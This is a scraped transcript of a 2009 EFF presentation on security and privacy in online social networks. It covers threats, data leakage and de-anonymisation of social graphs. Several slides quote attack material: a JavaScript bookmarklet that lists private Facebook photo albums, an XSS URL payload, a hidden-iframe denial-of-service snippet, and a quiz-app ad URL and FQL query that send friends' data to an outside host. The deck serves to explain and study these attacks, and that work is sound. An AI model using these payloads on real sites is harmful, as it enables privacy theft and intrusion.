Security and Privacy Vulnerabilities of In-Car Wireless Networks: A ...
Security & Privacy in Online Social Networks
-
Upload
trinhtuong -
Category
Documents
-
view
214 -
download
0
Transcript of Security & Privacy in Online Social Networks
![Page 1: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/1.jpg)
Security & Privacy in Online Social Networks
Presentation to EFFDec 21, 2009
Joseph Bonneau, Computer Laboratory
![Page 2: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/2.jpg)
Hack #1a: PHP Photo Parameter Forging
Photo Exploits: PHP parameter fiddling (Ng, 2008)
![Page 3: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/3.jpg)
Hack #1b: CDN Photo URL Forging
Photo Exploits: Content Delivery Network URL fiddling
![Page 4: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/4.jpg)
Hack #1c: JS Photo Album listing
![Page 5: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/5.jpg)
Hack #1c: JS Photo Album listing
JavaScript addition:
javascript:(function(){function y(){if(x.readyState==4){q=x.responseText.substring(9);p=eval(’('+q+’)');document.getElementById(’tab_canvas’).innerHTML=p.payload.tab_content;}}x=window.XMLHttpRequest?new window.XMLHttpRequest:(window.ActiveXObject?new ActiveXObject(”MSXML2.XMLHTTP”):null);x.onreadystatechange=y;x.open(’POST’,'http://www.facebook.com/ajax/profile/tab.php’,true);x.send(’id=’+ProfileURIController._profileId+’&v=photos&__a=1′);})()
![Page 6: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/6.jpg)
Hack #1c: JS Photo Album listing
![Page 7: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/7.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III.Privacy
IV.The Future
![Page 8: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/8.jpg)
A Brief History
• SixDegrees.com, 1997
• Friendster, 2002
• MySpace, 2003
• Facebook, 2004
• Twitter, 2006
• Definitive account: danah boyd and Nicole Ellison “Social Network Sites: Definition, History, and Scholarship,” 2007
![Page 9: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/9.jpg)
Exponential Growth
![Page 10: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/10.jpg)
Global Players (4/2009)
Credit: Vincenzo Cosenza
![Page 11: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/11.jpg)
What's Unique About Social Networks?
Just LAMP websites where you list your friends...
![Page 12: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/12.jpg)
What's Unique About Social Networks?
Firehose of user data
![Page 13: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/13.jpg)
What's Unique About Social Networks?
Facebook Applications
![Page 14: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/14.jpg)
What's Unique About Social Networks?
Facebook Connect
![Page 15: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/15.jpg)
Web 2.0?
Function Internet versionHTML, JavaScript FBML
DB Queries SQL FBQLEmail SMTP FB Mail
Forums Usenet, etc. FB GroupsInstant Messages XMPP FB Chat
News Streams RSS FB StreamAuthentication FB ConnectPhoto Sharing FB PhotosVideo Sharing FB Video
FB NotesTwitter, etc. FB Status Updates
FB PointsEvent Planning FB EventsClassified Ads FB Marketplace
Facebook versionPage Markup
OpenIDFlickr, etc.
YouTube, etc.Blogging Blogger, etc.
MicrobloggingMicropayment Peppercoin, etc.
E-Vitecraigslist
![Page 16: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/16.jpg)
Parallel Trend: The Addition of Social Context
“Given sufficient funding, all web sites expand in functionality until users can add each other as friends”
![Page 17: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/17.jpg)
Facebook is the SNS that Matters
Dominant
− Largest and fastest-growing
− Most internationally successful
− Receives most media attention
Advanced
− Largest feature-set
− Most complex privacy model
− Closest representation of real-life social world
![Page 18: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/18.jpg)
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=read_stream
Credit: theharmonyguy
![Page 19: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/19.jpg)
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=1
Credit: theharmonyguy
![Page 20: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/20.jpg)
Hack #2: Facebook XSS
http://www.facebook.com/connect/prompt_permissions.php?ext_perm=%3Cscript%3Ealert(document.getElementById(%22post_form_id%22).value);%3C/script%3E
Credit: theharmonyguy
![Page 21: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/21.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III.Privacy
IV.The Future
![Page 22: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/22.jpg)
SNS Threat Model
![Page 23: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/23.jpg)
SNS Threat Model
Account compromise
− Email or SNS (practically the same)
Computer compromise
Monetary Fraud
− Increasingly becoming a payment platform
Service denial/mischief
![Page 24: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/24.jpg)
Web 2.0?
Function Internet versionHTML, JavaScript FBML
DB Queries SQL FBQLEmail SMTP FB Mail
Forums Usenet, etc. FB GroupsInstant Messages XMPP FB Chat
News Streams RSS FB StreamAuthentication FB ConnectPhoto Sharing FB PhotosVideo Sharing FB Video
FB NotesTwitter, etc. FB Status Updates
FB PointsEvent Planning FB EventsClassified Ads FB Marketplace
Facebook versionPage Markup
OpenIDFlickr, etc.
YouTube, etc.Blogging Blogger, etc.
MicrobloggingMicropayment Peppercoin, etc.
E-Vitecraigslist
![Page 25: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/25.jpg)
The Downside of Re-inventing the Internet
SNSs repeating all of the web's security problems− Phishing− Spam− 419 Scams & Fraud− Identity Theft/Impersonation− Malware− Cross-site Scripting− Click-Fraud− Stalking, Harassment, Bullying, Blackmail
![Page 26: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/26.jpg)
Phishing
Genuine Facebook emails
![Page 27: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/27.jpg)
Phishing
Phishing attempt, April 30, 2009
![Page 28: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/28.jpg)
Self-propagating Worms
Koobface worm, launched August 2008
![Page 29: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/29.jpg)
Self-propagating Worms
Koobface worm, launched August 2008
![Page 30: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/30.jpg)
Self-propagating Worms
![Page 31: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/31.jpg)
Password Sharing
![Page 32: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/32.jpg)
Spam
![Page 33: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/33.jpg)
Scams
Calvin: heyEvan: holy moly. what's up man?Calvin: i need your help urgentlyEvan: yes sirCalvin: am stuck here in londonEvan: stuck?Calvin: yes i came here for a vacationCalvin: on my process coming back home i was robbed inside the hotel i loged inEvan: ok so what do you needCalvin: can you loan me $900 to get a return ticket back home and pay my hotel billsEvan: how do you want me to loan it to you?Calvin: you can have the money send via western union
![Page 34: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/34.jpg)
Botnet Command & Control
Twitterbot, August 2009
![Page 35: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/35.jpg)
SNS-hosted botnet
Idea: add malicious JavaScript payload to a popular application
Example: Denial of Service:
<iframe name="1" style="border: 0px none #ffffff;
width: 0px; height: 0px;"
src="http://victim-host/image1.jpg”
</iframe><br/>
“Facebot” - Elias Athanasopoulos, A. Makridakis, D. Antoniades S. Antonatos, Sotiris Ioannidis, K. G. Anagnostakis and Evangelos P. Markatos. “Antisocial Networks: Turning a Social Network into a Botnet,” 2008.
![Page 36: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/36.jpg)
Common Trends
Social channels increase susceptibility to scams
− Personal information also aids greatly in targeted attacks
Fundamental issue: SNS environment leads to carelessness
− Rapid, erratic browsing
− Applications installed with little scrutiny
− Fun, noisy, unpredictable environment
− People use SNS with their brain turned off
![Page 37: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/37.jpg)
Common Trends
• Centralisation helps in prevention
− Complete control of messaging platform, blocking, revocation
• Social Context also useful
− Can develop strong IDS
− Analyse link structure, profiles, behavior logs
![Page 38: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/38.jpg)
Web Hacking
Most SNS have a poor security track record
− Rapid growth
− Complicated site design
− Many feature interactions
Third party apps even worse (“Month of Facebook Bugs”)
Lack of attention to security
− Over half of sites failing even to deploy TLS properly!
![Page 39: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/39.jpg)
FBML Translation
Facebook Markup Language
Result: arbitrary JavaScript execution (Felt, 2007)
Translated into HTML:
![Page 40: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/40.jpg)
Facebook Query Language
Facebook Query Language Exploits (Bonneau, Anderson, Danezis, 2009)
![Page 41: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/41.jpg)
Hack #3: Facebook XSRF/Automatic Authentication
Credit: Ronan Zilberman
![Page 42: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/42.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III.Privacy
IV.The Future
![Page 43: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/43.jpg)
Data of Interest
![Page 44: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/44.jpg)
Data of Interest
Profile Data
− Loads of PII (contact info, address, DOB)
− Tastes, preferences
Graph Data
− Friendship connections
− Common group membership
− Communication patterns
Activity Data
− Time, frequency of log-in, typical behavior
![Page 45: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/45.jpg)
Major Privacy Problems
Data is shared in ways that most users don't expect
“Contextual integrity” not maintained
Three main drivers:
− Poor implementation
− Misaligned incentives & economic pressure
− Indirect information leakage
![Page 46: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/46.jpg)
Poor Implementation
![Page 47: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/47.jpg)
Poor Implementation
Orkut Photo Tagging
![Page 48: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/48.jpg)
Poor Implementation
Facebook Connect
![Page 49: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/49.jpg)
Poor Implementation
− Applications given full access to profile data of installed users− Even less revenue available for application developers...
![Page 50: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/50.jpg)
Hack #4: Application Data Theft
What happens when you take a quiz...
![Page 51: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/51.jpg)
Hack #4: Application Data Theft
Facebook Application Architecture
![Page 52: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/52.jpg)
Hack #4: Application Data Theft
URL for banner ad
http://sochr.com/i.php&name=[Joseph Bonneau]&nx=[My User ID]&age=[My DOB]&gender=[My Gender]&pic=[My Photo URL]&fname0=[Friend #1 Name 1]&fname1=[Friend #2 Name]&fname2=[Friend #3 Name]&fname3=[Friend #4 Name]&fpic0=[Friend #1 Photo URL]&fpic0=[Friend #2 Photo URL]&fpic0=[Friend #3 Photo URL]&fpic0=[Friend #4 Photo URL]&fb_session_params=[All of the quiz application's session parameters]
![Page 53: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/53.jpg)
Hack #4: Application Data Theft
Query made by banner ad through user's browser
select uid, birthday, current_location, sex, first_name, name, pic_square, relationship_status FROM user WHERE uid IN (select uid2 from friend where uid1 = ‘[current user id]‘) and strlen(pic) > 0 order by rand() limit 500
![Page 54: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/54.jpg)
Hack #4: Application Data Theft
What the users sees...
![Page 55: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/55.jpg)
Terms of Service
Terms of Service, hi5:
![Page 56: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/56.jpg)
Economic Pressure
Major survey of 45 social networks' privacy practices
Key Conclusions:
− “Market for privacy” fundamentally broken
− Huge network effects, lock-in, lemons market
− Sites with better privacy less likely to mention it!
− Privacy Salience
![Page 57: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/57.jpg)
Promotional Techniques
![Page 58: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/58.jpg)
Promotional Techniques
![Page 59: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/59.jpg)
The Push for Openness...
![Page 60: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/60.jpg)
Information leaked by the Social Graph...
![Page 61: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/61.jpg)
“Traditional” Social Network Analysis
• Performed by sociologists, anthropologists, etc. since the 70's
• Use data carefully collected through interviews & observation
• Typically < 100 nodes
• Complete knowledge
• Links have consistent meaning
• All of these assumptions fail badly for online social network data
![Page 62: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/62.jpg)
Traditional Graph Theory
• Nice Proofs
• Tons of definitions
• Ignored topics:
• Large graphs
• Sampling
• Uncertainty
![Page 63: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/63.jpg)
Models Of Complex Networks From Math & Physics
Many nice models
• Erdos-Renyi
• Watts-Strogatz
• Barabasi-Albert
Social Networks properties:
• Power-law
• Small-world
• High clustering coefficient
![Page 64: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/64.jpg)
Real social graphs are complicated!
![Page 65: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/65.jpg)
When In Doubt, Compute!
We do know many graph algorithms:
• Find important nodes
• Identify communities
• Train classifiers
• Identify anomalous connections
Major Privacy Implications!
![Page 66: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/66.jpg)
Privacy Questions
• What can we infer purely from link structure?
![Page 67: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/67.jpg)
Privacy Questions
• What can we infer purely from link structure?
A surprising amount!
• Popularity
• Centrality
• Introvert vs. Extrovert
• Leadership potential
• Communities
![Page 68: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/68.jpg)
Privacy Questions
• If we know nothing about a node but its neighbours, what can we infer?
![Page 69: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/69.jpg)
Privacy Questions
• If we know nothing about a node but its neighbours, what can we infer?
A lot!
• Sexual Orientation
• Gender
• Political Beliefs
• Location
• Breed?
![Page 70: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/70.jpg)
Privacy Questions
• Can we anonymise graphs?
![Page 71: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/71.jpg)
• Can we anonymise graphs?
Not easily...
• Seminal result by Backstrom et al.: Active attack needs just 7 nodes
• Can do even better given user's complete neighborhood
• Also results for correlating users across networks
• Developing line of research...
Privacy Questions
![Page 72: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/72.jpg)
De-anonymisation (active)
B
CF
A
H
D G
E I
A Social Graph with Private Links
![Page 73: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/73.jpg)
De-anonymisation (active)
B
CF 3
2
4A
1H
D G5
E I
Attacker adds k nodes with random edges
![Page 74: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/74.jpg)
De-anonymisation (active)
B
CF 3
2
4A
1H
D G5
E I
Attacker links to targeted nodes
![Page 75: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/75.jpg)
De-anonymisation (active)
Graph is anonymised and edges are released
![Page 76: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/76.jpg)
De-anonymisation (active)
3
2
4
1
5
Attacker searches for unique k-subgroup
![Page 77: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/77.jpg)
De-anonymisation (active)
3
2
4
1H
G5
Link between targeted nodes is confirmed
![Page 78: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/78.jpg)
De-anonymisation (passive)
• Similar to above, except k normal users collude and share their links
• Only compromise random targets
![Page 79: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/79.jpg)
De-anonymisation results
• 7 nodes need to be created in active attack
• De-anonymize 70 chosen nodes!
• 7 nodes in passive coalition compromise ~ 10 random nodes
![Page 80: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/80.jpg)
Cross-graph De-anonymisation
• Goal: identify users in a private graph by mapping to public graph
• “Shouldn't” work: graph isomorphism isn't thought to be in P
• Works quite well in practice on real graphs!
![Page 81: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/81.jpg)
Cross-graph De-anonymisation
Public Graph Private Graph
![Page 82: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/82.jpg)
Cross-graph De-anonymisation
A
C
BA'
C'
B'
Public Graph Private GraphPublic Graph
Step 1: Identify Seed Nodes
![Page 83: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/83.jpg)
Cross-graph De-anonymisation
A
DC
BA'
D'C'
B'
Public Graph Private GraphPublic Graph
Step 2: Assign mappings based on mapped neighbors
![Page 84: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/84.jpg)
Cross-graph De-anonymisation
A
DC
E
BA'
D'C'
E'
B'
Public Graph Private GraphPublic Graph
Step 3: Iterate
![Page 85: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/85.jpg)
Cross-graph De-anonymisation
• Demonstrated on Twitter and Flickr
• Only 24% of Twitter users on Flickr, 5% of Twitter users on Flickr
• 31% of common users identified (~9,000) given just 30 seeds!
• Real-world attacks can be much more powerful
• Auxiliary knowledge
• Mapping of attributes, language use, etc.
![Page 86: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/86.jpg)
Privacy Questions
• What can we infer if we “compromise” a fraction of nodes?
![Page 87: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/87.jpg)
• What can we infer if we “compromise” a fraction of nodes?
A lot...
• Common theme: small groups of nodes can see the rest
• Danezis et al.
• Nagaraja
• Korolova et al.
• Bonneau et al.
Privacy Questions
![Page 88: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/88.jpg)
• What if we get a subset of neighbours for all nodes?
Privacy Questions
![Page 89: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/89.jpg)
• What if we get a subset of k neighbours for all nodes?
• Can still approximate most functions of the graph
• Bonneau et al.
• Danezis et al.
• Nagaraja
Privacy Questions
![Page 90: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/90.jpg)
Overview
I. The Social Network Ecosystem
II. Security
III.Privacy
IV.The Future
![Page 91: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/91.jpg)
• How will SNS make money?
• Banner Advertising
• Brand management
• Real-time search/Open-source intelligence
• Subscription/“freemium”
Questions for the future
![Page 92: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/92.jpg)
• How will long-term SNS be architected?
• Proprietary walled-garden
• Commercial, with open standards
• De-centralized
Questions for the future
![Page 93: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/93.jpg)
• How will third-party developers be policed?
• Technical limitations
• Policing
• Reputation
Questions for the future
![Page 94: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/94.jpg)
• Who will regulate SNS?
• Self-regulation
• Government
• Some interest from Canadian PC, Spain, Germany, ENISA, FTC
• User Democracy?
• Non-profits/academics
• EFF and friends :-)
Questions for the future
![Page 95: Security & Privacy in Online Social Networks](https://reader034.fdocuments.in/reader034/viewer/2022051715/588f00d21a28abb5518bbeeb/html5/thumbnails/95.jpg)
My Reading List
• http://www.cl.cam.ac.uk/~jcb82/sns_bib/main.html
• Questions?